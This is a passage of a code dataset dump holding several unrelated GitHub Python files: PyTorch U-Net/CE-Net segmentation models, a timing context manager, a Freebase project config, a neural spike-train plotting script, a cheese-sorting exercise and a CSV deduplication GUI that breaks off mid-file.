inplace=True)\n\nclass DACblock(nn.Module):\n def __init__(self, channel):\n super(DACblock, self).__init__()\n self.dilate1 = nn.Conv2d(channel, channel, kernel_size=3, dilation=1, padding=1)\n self.dilate2 = nn.Conv2d(channel, channel, kernel_size=3, dilation=3, padding=3)\n self.dilate3 = nn.Conv2d(channel, channel, kernel_size=3, dilation=5, padding=5)\n self.conv1x1 = nn.Conv2d(channel, channel, kernel_size=1, dilation=1, padding=0)\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n m.bias.data.zero_() \n\n def forward(self, x):\n dilate1_out = nonlinearity(self.dilate1(x))\n dilate2_out = nonlinearity(self.conv1x1(self.dilate2(x)))\n dilate3_out = nonlinearity(self.conv1x1(self.dilate2(self.dilate1(x))))\n dilate4_out = nonlinearity(self.conv1x1(self.dilate3(self.dilate2(self.dilate1(x)))))\n out = x + dilate1_out + dilate2_out + dilate3_out + dilate4_out\n return out\n\nclass SPPblock(nn.Module):\n def __init__(self, in_channels):\n super(SPPblock, self).__init__()\n self.pool1 = nn.MaxPool2d(kernel_size=[2, 2], stride=2)\n self.pool2 = nn.MaxPool2d(kernel_size=[3, 3], stride=3)\n self.pool3 = nn.MaxPool2d(kernel_size=[5, 5], stride=5)\n self.pool4 = nn.MaxPool2d(kernel_size=[6, 6], stride=6)\n\n self.conv = nn.Conv2d(in_channels=in_channels, out_channels=1, kernel_size=1, padding=0)\n\n def forward(self, x):\n self.in_channels, h, w = x.size(1), x.size(2), x.size(3)\n self.layer1 = F.upsample(self.conv(self.pool1(x)), size=(h, w), mode='bilinear')\n self.layer2 = F.upsample(self.conv(self.pool2(x)), size=(h, w), mode='bilinear')\n self.layer3 = F.upsample(self.conv(self.pool3(x)), size=(h, w), mode='bilinear')\n self.layer4 = F.upsample(self.conv(self.pool4(x)), size=(h, w), mode='bilinear')\n\n out = torch.cat([self.layer1, self.layer2, self.layer3, self.layer4, x], 1)\n\n return out\n\n\nclass mod_SPPblock(nn.Module):\n def __init__(self, in_channels):\n super(SPPblock, self).__init__()\n self.pool1 = nn.MaxPool2d(kernel_size=[2, 2], stride=2)\n self.pool2 = nn.MaxPool2d(kernel_size=[3, 3], stride=3)\n self.pool3 = nn.MaxPool2d(kernel_size=[5, 5], stride=5)\n self.pool4 = nn.MaxPool2d(kernel_size=[6, 6], stride=6)\n\n self.conv = nn.Conv2d(in_channels=in_channels, out_channels=1, kernel_size=1, padding=0)\n\n def forward(self, x):\n self.in_channels, h, w = x.size(1), x.size(2), x.size(3)\n self.layer1 = F.upsample(self.conv(self.pool1(x)), size=(h, w), mode='bilinear')\n self.layer2 = F.upsample(self.conv(self.pool2(x)), size=(h, w), mode='bilinear')\n self.layer3 = F.upsample(self.conv(self.pool3(x)), size=(h, w), mode='bilinear')\n self.layer4 = F.upsample(self.conv(self.pool4(x)), size=(h, w), mode='bilinear')\n out = self.layer1 + self.layer2 + self.layer3 + self.layer4\n return out\n\n\nclass DecoderBlock(nn.Module):\n def __init__(self, in_channels, n_filters):\n super(DecoderBlock, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels, in_channels // 4, 1)\n self.norm1 = nn.BatchNorm2d(in_channels // 4)\n self.relu = nn.ReLU()\n\n self.deconv2 = nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 3, stride=2, padding=1, output_padding=1)\n self.norm2 = nn.BatchNorm2d(in_channels // 4)\n \n self.conv3 = nn.Conv2d(in_channels // 4, n_filters, 1)\n self.norm3 = nn.BatchNorm2d(n_filters)\n\n def forward(self, x): \n x = self.conv1(x)\n x = self.norm1(x)\n x = self.relu(x)\n \n x = self.deconv2(x)\n x = self.norm2(x)\n x = self.relu(x)\n\n x = self.conv3(x)\n x = self.norm3(x)\n x = self.relu(x)\n return x\n\ndef freeze_layer(layer):\n for param in layer.parameters():\n param.requires_grad = False\n\ndef adjustpad_cat(x1,x2): \n # input is CHW \n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3] \n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd\n x = torch.cat([x2, x1], dim=1)\n return x \n\ndef adjustpad_add(x1,x2): \n # input is CHW \n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3] \n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd \n x = x1 + x2 \n return x \n\n\nclass depthwise_separable_conv(nn.Module):\n def __init__(self, nin, nout):\n super(depthwise_separable_conv, self).__init__()\n self.depthwise = nn.Conv2d(nin, nin, kernel_size=3, padding=1, groups=nin)\n self.pointwise = nn.Conv2d(nin, nout, kernel_size=1)\n\n def forward(self, x):\n # print(x.shape)\n out = self.depthwise(x)\n out = self.pointwise(out)\n return out \n\n\nclass double_depth_conv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(double_depth_conv, self).__init__()\n self.depth = nn.Sequential(\n depthwise_separable_conv(in_ch, out_ch),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n depthwise_separable_conv(out_ch, out_ch),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n self.conv1 = nn.Sequential( \n nn.Conv2d(in_ch, out_ch, kernel_size = 1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n x = self.depth(x) + self.conv1(x) # for_high_dimensional feature maps\n # print(x.shape)\n # x = self.depth(x) \n return x \n\nclass DACblock_mod(nn.Module):\n def __init__(self, channel):\n super(DACblock_mod, self).__init__()\n self.dilate1 = nn.Conv2d(channel, channel, kernel_size=3, dilation=1, padding=1)\n self.dilate2 = nn.Conv2d(channel, channel, kernel_size=3, dilation=3, padding=3)\n self.dilate3 = nn.Conv2d(channel, channel, kernel_size=3, dilation=5, padding=5)\n self.conv1x1 = nn.Conv2d(channel, channel, kernel_size=1, dilation=1, padding=0)\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n m.bias.data.zero_() \n\n def forward(self, x):\n dilate1_out = nonlinearity(self.dilate1(x))\n dilate2_out = nonlinearity(self.conv1x1(self.dilate2(x)))\n dilate3_out = nonlinearity(self.conv1x1(self.dilate2(self.dilate1(x))))\n dilate4_out = nonlinearity(self.conv1x1(self.dilate3(self.dilate2(self.dilate1(x)))))\n out = x + dilate1_out + dilate2_out + dilate3_out + dilate4_out\n return out\n\n\n###### original double convolution module\n# class double_conv(nn.Module):\n# def __init__(self, in_ch, out_ch):\n# super(double_conv, self).__init__()\n# self.conv = nn.Sequential(\n# nn.Conv2d(in_ch, out_ch, kernel_size=3, padding=1),\n# nn.BatchNorm2d(out_ch),\n# nn.ReLU(inplace=True),\n# nn.Conv2d(out_ch, out_ch, kernel_size=3, padding=1),\n# nn.BatchNorm2d(out_ch),\n# nn.ReLU(inplace=True)\n# )\n\n# def forward(self, x):\n# x = self.conv(x)\n# return x\n \n \nclass inception(nn.Module):\n def __init__(self, channel):\n super(inception, self).__init__()\n self.dilate1 = nn.Conv2d(channel, channel, kernel_size=1, dilation=1, padding=0)\n\n self.dilate3 = nn.Conv2d(channel, channel, kernel_size=3, dilation=1, padding=1)\n self.conv1x1 = nn.Conv2d(2 * channel, channel, kernel_size=1, dilation=1, padding=0)\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x):\n dilate1_out = nonlinearity(self.dilate1(x)) \n dilate2_out = nonlinearity(self.dilate3(self.dilate1(x)))\n dilate_concat = nonlinearity(self.conv1x1(torch.cat([dilate1_out, dilate2_out], 1)))\n dilate3_out = nonlinearity(self.dilate1(dilate_concat))\n out = x + dilate3_out \n return out\n\nclass inconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(inconv, self).__init__()\n self.conv = double_depth_conv(in_ch, out_ch)\n\n def forward(self, x):\n x = self.conv(x)\n return x\n\n# changing max pool to strided conv (simplicity) for downsampling \n\nclass down(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(down, self).__init__()\n self.strided_conv = nn.Sequential(\n nn.Conv2d(in_ch, in_ch, 3, 2, 1 ), # padding and stride \n double_depth_conv(in_ch, out_ch)\n )\n\n def forward(self, x):\n x = self.strided_conv(x) \n return x\n\n\nclass up(nn.Module):\n def __init__(self, in_ch, out_ch, bilinear=True):\n super(up, self).__init__()\n if bilinear:\n self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)\n else:\n self.up = nn.ConvTranspose2d(in_ch // 2, in_ch // 2, 2, stride=2)\n\n self.conv = double_depth_conv(in_ch, out_ch)\n\n def forward(self, x1, x2):\n x1 = self.up(x1) \n x = adjustpad_cat(x1, x2)\n x = self.conv(x)\n return x\n\n\nclass outconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(outconv, self).__init__()\n self.conv = nn.Conv2d(in_ch, out_ch, kernel_size=1)\n\n def forward(self, x):\n x = self.conv(x)\n return x\n\nclass conv_block(nn.Module):\n def __init__(self,ch_in,ch_out):\n super(conv_block,self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(ch_in, ch_out, kernel_size=3,stride=1,padding=1,bias=True),\n nn.BatchNorm2d(ch_out),\n nn.ReLU(), \n nn.Conv2d(ch_out, ch_out, kernel_size=3,stride=1,padding=1,bias=True),\n nn.BatchNorm2d(ch_out),\n nn.ReLU() \n )\n\n\n def forward(self,x):\n x = self.conv(x)\n return x\n\n\nclass up_conv(nn.Module):\n def __init__(self,ch_in,ch_out):\n super(up_conv,self).__init__()\n self.up = nn.Sequential(\n nn.Upsample(scale_factor=2),\n nn.Conv2d(ch_in,ch_out,kernel_size=3,stride=1,padding=1,bias=True),\n\t\t nn.BatchNorm2d(ch_out),\n\t\t\tnn.ReLU() \n )\n\n def forward(self,x):\n x = self.up(x)\n return x\n\nclass Attention_block(nn.Module):\n def __init__(self,F_g,F_l,F_int):\n super(Attention_block,self).__init__()\n self.W_g = nn.Sequential(\n nn.Conv2d(F_g, F_int, kernel_size=1,stride=1,padding=0,bias=True),\n nn.BatchNorm2d(F_int)\n )\n \n self.W_x = nn.Sequential(\n nn.Conv2d(F_l, F_int, kernel_size=1,stride=1,padding=0,bias=True),\n nn.BatchNorm2d(F_int)\n )\n\n self.psi = nn.Sequential(\n nn.Conv2d(F_int, 1, kernel_size=1,stride=1,padding=0,bias=True),\n nn.BatchNorm2d(1) \n )\n \n self.relu = nn.ReLU(inplace=True)\n \n def forward(self,g,x):\n g1 = self.W_g(g) \n x1 = self.W_x(x) \n x = adjustpad_add(x1, g1) # played around\n psi = self.relu(x) \n psi = self.psi(psi)\n\n return x*psi\n\n\n\nclass AttU_Net(nn.Module):\n def __init__(self,img_ch=3,output_ch=1):\n super(AttU_Net,self).__init__()\n \n self.Maxpool = nn.MaxPool2d(kernel_size=2,stride=2)\n\n self.Conv1 = conv_block(ch_in=img_ch,ch_out=64)\n self.Conv2 = conv_block(ch_in=64,ch_out=128)\n self.Conv3 = conv_block(ch_in=128,ch_out=256)\n self.Conv4 = conv_block(ch_in=256,ch_out=512)\n self.Conv5 = conv_block(ch_in=512,ch_out=1024)\n\n self.Up5 = up_conv(ch_in=1024,ch_out=512)\n self.Att5 = Attention_block(F_g=512,F_l=512,F_int=256)\n self.Up_conv5 = conv_block(ch_in=1024, ch_out=512)\n\n self.Up4 = up_conv(ch_in=512,ch_out=256)\n self.Att4 = Attention_block(F_g=256,F_l=256,F_int=128)\n self.Up_conv4 = conv_block(ch_in=512, ch_out=256)\n \n self.Up3 = up_conv(ch_in=256,ch_out=128)\n self.Att3 = Attention_block(F_g=128,F_l=128,F_int=64)\n self.Up_conv3 = conv_block(ch_in=256, ch_out=128)\n \n self.Up2 = up_conv(ch_in=128,ch_out=64)\n self.Att2 = Attention_block(F_g=64,F_l=64,F_int=32)\n self.Up_conv2 = conv_block(ch_in=128, ch_out=64)\n\n self.Conv_1x1 = nn.Conv2d(64,output_ch,kernel_size=1,stride=1,padding=0)\n\n\n def forward(self,x):\n # encoding path\n x1 = self.Conv1(x)\n\n x2 = self.Maxpool(x1)\n x2 = self.Conv2(x2)\n \n x3 = self.Maxpool(x2)\n x3 = self.Conv3(x3)\n\n x4 = self.Maxpool(x3)\n x4 = self.Conv4(x4)\n\n x5 = self.Maxpool(x4)\n x5 = self.Conv5(x5)\n\n # decoding + concat path\n d5 = self.Up5(x5) \n pdb.set_trace()\n x4 = self.Att5(g=d5,x=x4) \n d5 = self.Up_conv5(d5)\n \n d4 = self.Up4(d5)\n x3 = self.Att4(g=d4,x=x3)\n d4 = torch.cat((x3,d4),dim=1)\n d4 = self.Up_conv4(d4)\n\n d3 = self.Up3(d4)\n x2 = self.Att3(g=d3,x=x2)\n d3 = torch.cat((x2,d3),dim=1)\n d3 = self.Up_conv3(d3)\n\n d2 = self.Up2(d3)\n x1 = self.Att2(g=d2,x=x1)\n d2 = torch.cat((x1,d2),dim=1)\n d2 = self.Up_conv2(d2)\n\n d1 = self.Conv_1x1(d2)\n\n out = d1\n\n return out\n\nclass mod_u(nn.Module):\n def __init__(self, n_channels=3, n_classes=1):\n super(mod_u, self).__init__()\n self.inc = inconv(n_channels, 64)\n self.down1 = down(64, 128)\n self.down2 = down(128, 256)\n self.down3 = down(256, 512)\n self.down4 = down(512, 512)\n\n # center \n # self.dblock = DACblock_mod(512)\n # self.incep = inception(512) \n\n self.up1 = up(1024, 256)\n self.up2 = up(512, 128)\n self.up3 = up(256, 64)\n self.up4 = up(128, 64)\n self.outc = outconv(64, n_classes)\n # self.relu = nn.ReLU()\n\n def forward(self, x):\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n \n # center # atrous_conv \n # x5 = self.dblock(x5)\n # x block \n # x5 = self.incep(x5)\n\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n x = self.relu(x) # is relu req? # can exp \n return x \n \nclass UNet(nn.Module):\n def __init__(self, n_channels=3, n_classes=1):\n super(UNet, self).__init__()\n self.inc = inconv(n_channels, 16)\n self.down1 = down(16, 32)\n self.down2 = down(32, 64)\n self.down3 = down(64, 128)\n self.down4 = down(128, 256)\n self.up1 = up(256, 128)\n self.up2 = up(128, 64)\n self.up3 = up(64,32)\n self.up4 = up(32, 16)\n self.outc = outconv(16, n_classes)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x) \n return x\n\n\nclass mod_ce(nn.Module):\n def __init__(self, num_classes= 1, num_channels=3):\n super(mod_ce, self).__init__()\n\n filters = [64, 128, 256, 512]\n # filters = [16, 32, 64, 128]\n resnet = models.resnet34(pretrained=True) \n # self.firstconv = resnet.conv1 \n self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7,7), stride=(2,2), padding=(3,3), bias = False) # change for having input channels = 19\n\n self.firstbn = resnet.bn1 \n self.firstmaxpool = resnet.maxpool\n self.encoder1 = resnet.layer1\n self.encoder2 = resnet.layer2\n self.encoder3 = resnet.layer3 \n self.encoder4 = resnet.layer4\n \n self.dblock = DACblock(512) \n self.spp = SPPblock(512) \n\n self.decoder4 = DecoderBlock(512, filters[2]) \n self.decoder3 = DecoderBlock(filters[2], filters[1])\n self.decoder2 = DecoderBlock(filters[1], filters[0])\n self.decoder1 = DecoderBlock(filters[0], filters[0])\n self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 4, 2, 1)\n self.finalconv2 = nn.Conv2d(32, 32, 3, padding=1)\n self.finalconv3 = nn.Conv2d(32, num_classes, 3, padding=1) \n self.relu = nn.ReLU()\n\n def forward(self, x):\n # Encoder\n \n x = self.firstconv(x)\n x = self.firstbn(x)\n x = self.firstmaxpool(x) \n x = self.relu(x) \n \n e1 = self.encoder1(x) \n e2 = self.encoder2(e1)\n e3 = self.encoder3(e2)\n e4 = self.encoder4(e3)\n \n # Center \n \n e4 = self.dblock(e4) \n \n # DAC only \n\n # Decoder\n d4 = self.decoder4(e4) + e3 \n d3 = adjustpad_add(e2, self.decoder3(d4))\n d2 = adjustpad_add(e1, self.decoder2(d3))\n # d3 = self.decoder3(d4) + e2\n # d2 = self.decoder2(d3) + e1\n d1 = self.decoder1(d2)\n\n out = self.finaldeconv1(d1)\n out = self.relu(out)\n out = self.finalconv2(out)\n out = self.relu(out)\n out = self.finalconv3(out)\n return out\n\n\nclass CE_Net_(nn.Module):\n def __init__(self, num_classes= 1, num_channels=3):\n super(CE_Net_, self).__init__()\n\n filters = [64, 128, 256, 512]\n resnet = models.resnet34(pretrained=True) \n # self.firstconv = resnet.conv1 \n self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7,7), stride=(2,2), padding=(3,3), bias = False) # change for having input channels = 19\n self.firstbn = resnet.bn1\n self.firstrelu = resnet.relu\n self.firstmaxpool = resnet.maxpool\n self.encoder1 = resnet.layer1\n self.encoder2 = resnet.layer2\n self.encoder3 = resnet.layer3\n self.encoder4 = resnet.layer4\n\n self.dblock = DACblock(512)\n self.spp = SPPblock(512)\n\n self.decoder4 = DecoderBlock(516, filters[2])\n self.decoder3 = DecoderBlock(filters[2], filters[1])\n self.decoder2 = DecoderBlock(filters[1], filters[0])\n self.decoder1 = DecoderBlock(filters[0], filters[0])\n\n self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 4, 2, 1)\n self.finalrelu1 = nonlinearity\n self.finalconv2 = nn.Conv2d(32, 32, 3, padding=1)\n self.finalrelu2 = nonlinearity\n self.finalconv3 = nn.Conv2d(32, num_classes, 3, padding=1)\n\n def forward(self, x):\n # Encoder\n x = self.firstconv(x)\n x = self.firstbn(x)\n x = self.firstrelu(x)\n x = self.firstmaxpool(x)\n e1 = self.encoder1(x)\n e2 = self.encoder2(e1)\n e3 = self.encoder3(e2)\n e4 = self.encoder4(e3)\n\n # Center\n e4 = self.dblock(e4)\n e4 = self.spp(e4)\n\n # Decoder\n d4 = self.decoder4(e4) + e3 \n d3 = adjustpad_add(e2, self.decoder3(d4))\n d2 = adjustpad_add(e1, self.decoder2(d3))\n \n # d4 = self.decoder4(e4) + e3\n # d3 = self.decoder3(d4) + e2\n # d2 = self.decoder2(d3) + e1\n d1 = self.decoder1(d2)\n\n out = self.finaldeconv1(d1)\n out = self.finalrelu1(out)\n out = self.finalconv2(out)\n out = self.finalrelu2(out)\n out = self.finalconv3(out) \n return out\n\n\n\n\n# import os; os.environ['CUDA_VISIBLE_DEVICES'] = '0' \n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") \n\n# # model = mod_u(n_channels=19, n_classes=19).to(device) # not working on GPU \n# # model = UNet(n_channels=19, n_classes=19).to(device) # not working on GPU\n# # model = AttU_Net(img_ch=19, output_ch=19).to(device) \n# # model = mod_ce(num_classes=19, num_channels=19).to(device) \n# model = CE_Net_(num_classes=19, num_channels=19).to(device) \n\n# summary( model, (19, 512, 512))\n","repo_name":"Siddharth-Shrivastava7/Prior-Net-Segcorrection","sub_path":"old_trying/model/unet_models_btech.py","file_name":"unet_models_btech.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14865912745","text":"import time\n\n\nclass CodeTimer:\n def __init__(self):\n self.start = None\n\n def __enter__(self):\n self.start = time.time()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # print(exc_type)\n # print(exc_tb)\n # print(exc_val)\n t = time.time() - self.start\n print('Итого время работы составило', t, 'сек')\n return True\n\ntimer = CodeTimer()\n\nwith timer:\n l = [i for i in range(100)]\n l[101]\n 5 + 'a'\n","repo_name":"Night575/4_module","sub_path":"1221/Module_3/3_les_5/context_m.py","file_name":"context_m.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29414422668","text":"# DB\ndialect = \"mysql\"\ndriver = \"mysqlconnector\"\nhost = \"localhost\"\nport = \"8889\"\nusername = \"freebase\"\npassword = \"freebase\"\ndatabase = \"freebase\"\nDB_URI = f\"{dialect}+{driver}://{username}:{password}@{host}:{port}/{database}\"\nBASE_URL = \"Freebase\"\n\n# FEATURES TUNING\nTHRESHOLD = 0.7\nTOP_N_FEATURES = 5\n\n# SOURCE\nLOOKUP = 'lookup'\nTARGET = 'target'\nDATASET_DIR = '{PATH}/AFEGKG/datasets/'\nSOURCE_PATH = '{PATH}/freebase-rdf-latest.gz'\n\nALLOWED_ENTITIES = {\n '/music/': 'music',\n '/film/': 'film',\n '/tv/': 'tv',\n '/location/': 'location',\n '/people/': 'people',\n '/measurement_unit/': 'measurement_unit',\n '/book/': 'book',\n '/media_common/': 'media_common',\n '/medicine/': 'medicine',\n '/award/': 'award',\n '/biology/': 'biology',\n '/sports/': 'sports',\n '/organization/': 'organization',\n '/education/': 'education',\n '/baseball/': 'baseball',\n '/business/': 'business',\n '/imdb/': 'imdb',\n '/government/': 'government',\n '/cvg/': 'cvg',\n '/soccer/': 'soccer',\n '/time/': 'time',\n '/astronomy/': 'astronomy',\n '/basketball/': 'basketball',\n '/american_football/': 'american_football',\n '/olympics/': 'olympics',\n '/fictional_universe/': 'fictional_universe',\n '/theater/': 'theater',\n '/visual_art/': 'visual_art',\n '/military/': 'military',\n '/protected_sites/': 'protected_sites',\n '/geography/': 'geography',\n '/broadcast/': 'broadcast',\n '/architecture/': 'architecture',\n '/food/': 'food',\n '/aviation/': 'aviation',\n '/finance/': 'finance',\n '/transportation/': 'transportation',\n '/boats/': 'boats',\n '/computer/': 'computer',\n '/royalty/': 'royalty',\n '/library/': 'library',\n '/internet/': 'internet',\n '/wine/': 'wine',\n '/projects/': 'projects',\n '/chemistry/': 'chemistry',\n '/cricket/': 'cricket',\n '/travel/': 'travel',\n '/symbols/': 'symbols',\n '/religion/': 'religion',\n '/influence/': 'influence',\n '/language/': 'language',\n '/community/': 'community',\n '/metropolitan_transit/': 'metropolitan_transit',\n '/automotive/': 'automotive',\n '/digicams/': 'digicams',\n '/law/': 'law',\n '/exhibitions/': 'exhibitions',\n '/tennis/': 'tennis',\n '/venture_capital/': 'venture_capital',\n '/opera/': 'opera',\n '/comic_books/': 'comic_books',\n '/amusement_parks/': 'amusement_parks',\n '/dining/': 'dining',\n '/ice_hockey/': 'ice_hockey',\n '/event/': 'event',\n '/spaceflight/': 'spaceflight',\n '/zoo/': 'zoo',\n '/meteorology/': 'meteorology',\n '/martial_arts/': 'martial_arts',\n '/periodicals/': 'periodicals',\n '/games/': 'games',\n '/celebrities/': 'celebrities',\n '/nytimes/': 'nytimes',\n '/rail/': 'rail',\n '/interests/': 'interests',\n '/atom/': 'atom',\n '/boxing/': 'boxing',\n '/comic_strips/': 'comic_strips',\n '/conferences/': 'conferences',\n '/skiing/': 'skiing',\n '/engineering/': 'engineering',\n '/fashion/': 'fashion',\n '/radio/': 'radio',\n '/distilled_spirits/': 'distilled_spirits',\n '/chess/': 'chess',\n '/physics/': 'physics',\n '/geology/': 'geology',\n '/bicycles/': 'bicycles',\n '/comedy/': 'comedy'\n}\n\nNOT_ALLOWED_TYPES = ['type', '/common/topic/topic_equivalent_webpage', '/type/object/key', '/wikipedia/en', '/en',\n '/common/topic/alias', '/common/topic/official_website', '/common/topic/topical_webpage',\n '/common/topic/webpage', '/common/topic/image', '/common/topic/webpage',\n '/common/topic/notable_types']\n","repo_name":"abuajaj/automatic-feature-engineering-gkg","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25684102763","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 23 21:41:41 2018\n\n@author: Stav\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom get_hist_sdf import get_hist_sdf\nfrom print_info import print_info\n\ndef time_in_ms_to_index(ms_time):\n return ms_time + 100\n\ndef index_to_time_in_ms(arr_ind):\n return float(arr_ind)/float(1000)\n\ndef plot_spike_train_sdf_with_latency(spike_train, fig_path):\n number_of_std = 3\n window_in_ms = float(10) # 5\n first_possible_response = 50\n start_window_in_ms = float(-100)\n end_window_in_ms = float(250)\n window_in_secs = window_in_ms/float(1000)\n min_range = int(float(-100)/window_in_ms)\n max_range = int(float(250)/window_in_ms + 1)\n\n x_axis_values = [float(x)/float(1000) for x in range(min_range*int(window_in_ms), (max_range-1)*int(window_in_ms))]\n\n fig,ax = plt.subplots(1,1,figsize=(6,3))\n\n sdfs = np.zeros((len(spike_train), int(end_window_in_ms-start_window_in_ms)))\n for row_ind, row in enumerate(spike_train):\n sdf = get_hist_sdf(row)\n sdfs[row_ind, :] = sdf\n mean_sdf = sdfs.mean(axis=0)\n\n max_sdf_val = mean_sdf.max()\n ax.set_ylim([0, max_sdf_val])\n num_of_trains = len(spike_train)\n y_spike_locations = [(max_sdf_val/float(num_of_trains))*x for x in range(num_of_trains)]\n\n for r_ind, row in enumerate(spike_train):\n ax.plot(row, y_spike_locations[r_ind]*np.ones_like(row),'|',color='b')\n\n plt.plot(x_axis_values, mean_sdf, color='black')\n\n zero_ind = time_in_ms_to_index(0)\n pre_stimulus_vals = mean_sdf[:zero_ind]\n post_stimulus_val = mean_sdf[zero_ind:]\n\n pre_std_val = np.std(pre_stimulus_vals)\n pre_mean_val = np.mean(pre_stimulus_vals)\n positive_threshold = pre_mean_val + number_of_std*pre_std_val\n negative_threshold = pre_mean_val + -1*number_of_std*pre_std_val\n post_stimulus_arr = np.array(post_stimulus_val)\n\n first_occur = -1\n pos_first_occur = -1\n neg_first_occur = -1\n\n if post_stimulus_arr.max() > positive_threshold:\n pos_first_occur = np.argmax(post_stimulus_arr > positive_threshold)\n\n if post_stimulus_arr.min() < negative_threshold:\n neg_first_occur = np.argmax(post_stimulus_arr < negative_threshold)\n\n if pos_first_occur > -1 and neg_first_occur > -1:\n if pos_first_occur < neg_first_occur:\n first_occur = pos_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='green',alpha=0.5) \t\t\n else:\n first_occur = neg_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='red',alpha=0.5) \t\t\n else:\n if pos_first_occur > -1:\n first_occur = pos_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='green',alpha=0.5) \t\t \t\t\n elif neg_first_occur > -1:\n first_occur = neg_first_occur\n plt.axvline(x=index_to_time_in_ms(first_occur), color='red',alpha=0.5)\n\n ax.axvspan(start_window_in_ms/float(1000),0,color='gray',alpha=0.2)\n ax.set_xlim([start_window_in_ms/float(1000), end_window_in_ms/float(1000)])\n\n fig.savefig(fig_path)\n\n response_time = float('nan')\n if first_occur > -1:\n response_time = zero_ind+first_occur\n\n return response_time","repo_name":"StavHertz/MindReading","sub_path":"Stav/Latency/plot_spike_train_sdf_with_latency.py","file_name":"plot_spike_train_sdf_with_latency.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17659875868","text":"def sorting_cheeses(**kwargs):\n current_string = \"\"\n sorted_cheeses = sorted(kwargs.items(), key=lambda x: (-len(x[1]), (x[0])))\n\n for keys, values in sorted_cheeses:\n current_string += keys + '\\n'\n current_string += '\\n'.join(str(ch) for ch in sorted(values, reverse=True)) + '\\n'\n return current_string\n\n\nprint(sorting_cheeses(\n Parmesan=[102, 120, 135],\n Camembert=[100, 100, 105, 500, 430],\n Mozzarella=[50, 125],)\n)","repo_name":"AlexanderBedrosyan/Programming-Advanced-with-Python","sub_path":"Functions Advanced - Lab/cheese_showcase.py","file_name":"cheese_showcase.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"16638603850","text":"import pandas as pd\nimport tkinter as tk\nfrom tkinter import filedialog\n\n# Define the dark theme colors for the resulting window\nbg_color = \"#333333\"\nfg_color = \"#FFFFFF\"\n\ndef select_file():\n # Open a dialog box to select the CSV file\n file_path = filedialog.askopenfilename(title=\"Select a CSV file\", filetypes=((\"CSV files\", \"*.csv\"),))\n if file_path:\n process_csv(file_path)\n\ndef process_csv(file_path):\n # Read the CSV file using pandas\n df = pd.read_csv(file_path)\n\n # Prompt the user to enter the column name for finding duplicates\n column_name = input_box.get()\n\n # Find the duplicated values in the specified column and store them in a new dataframe\n duplicates = df[df.duplicated([column_name], keep=False)]\n\n # Remove the duplicates from the original dataframe\n df = df.drop_duplicates([column_name], keep=False)\n\n # Write the duplicated values to a new CSV file\n duplicates.to_csv('duplicates.csv', index=False)\n\n # Write the unique values to another 